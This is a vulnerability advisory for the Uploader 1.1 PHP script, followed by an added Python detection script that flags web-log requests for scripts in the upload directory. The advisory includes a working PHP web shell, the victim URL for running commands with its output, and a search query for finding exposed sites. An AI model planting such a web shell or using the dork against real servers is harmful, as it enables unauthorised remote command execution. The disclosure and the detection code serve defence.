Uploader Version 1.1, which is available from
http://www.phpscriptcenter.com/uploader.php
includes "uploader.php", which lets you upload ANY file (even scripts, e.g. in
PHP) onto the server
if no password protection is specified in the configuration file (password
protection is off by default).
Uploaded files are placed in the directory "uploads" unless configured
otherwise.
So if we create a file like this:
<?php
$cmd = $_GET["cmd"];
system("$cmd");
?>
and upload it as "shellemul.php", we can execute commands by pointing our
browser to
http://www.victim.com/uploads/shellemul.php?cmd=id
which will give us -->
uid=48(apache) gid=48(apache) groups=48(apache)
We could even upload PHPShell and have more comfortable fun.
---
Google gets me 411 hits for "allinurl: uploader.php"
---
by kcope (kingcope (at) gmx (dot) net)
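
Added example (not part of the original advisory and not code from the Uploader project): a detection check that scans web server access logs for requests to server-side scripts under the upload directory, and notes whether the same client POSTed to uploader.php earlier in the log. The Apache combined log format, the extension list and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit

# Assumptions (not from the advisory): Apache combined log format, and this
# extension list as the set of file types the server would execute.
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".cgi", ".pl")
UPLOAD_DIR = "/uploads/"    # default upload directory named in the advisory
UPLOADER = "/uploader.php"  # upload script named in the advisory
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_execution(lines):
    """Return one finding per request for a script inside the upload directory.

    'uploaded_first' is True when the same client POSTed to uploader.php earlier."""
    uploaders, findings = set(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        url = urlsplit(m["target"])
        path = url.path.lower()  # case-insensitive extension match
        if m["method"] == "POST" and path.endswith(UPLOADER):
            uploaders.add(m["ip"])
        elif UPLOAD_DIR in path and any(s.endswith(SCRIPT_EXT) for s in path.split("/")):
            findings.append({
                "ip": m["ip"], "time": m["ts"], "path": url.path,
                "status": int(m["status"]),
                "has_query": bool(url.query),
                "uploaded_first": m["ip"] in uploaders,
            })
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2004:13:55:01 +0000] "POST /uploader.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2004:13:55:20 +0000] "GET /uploads/shellemul.php?cmd=id HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2004:14:02:11 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2004:14:03:40 +0000] "GET /uploads/notes.PHP HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 and uploaded_first set is the strongest signal; any script file present in the upload directory is worth reviewing regardless.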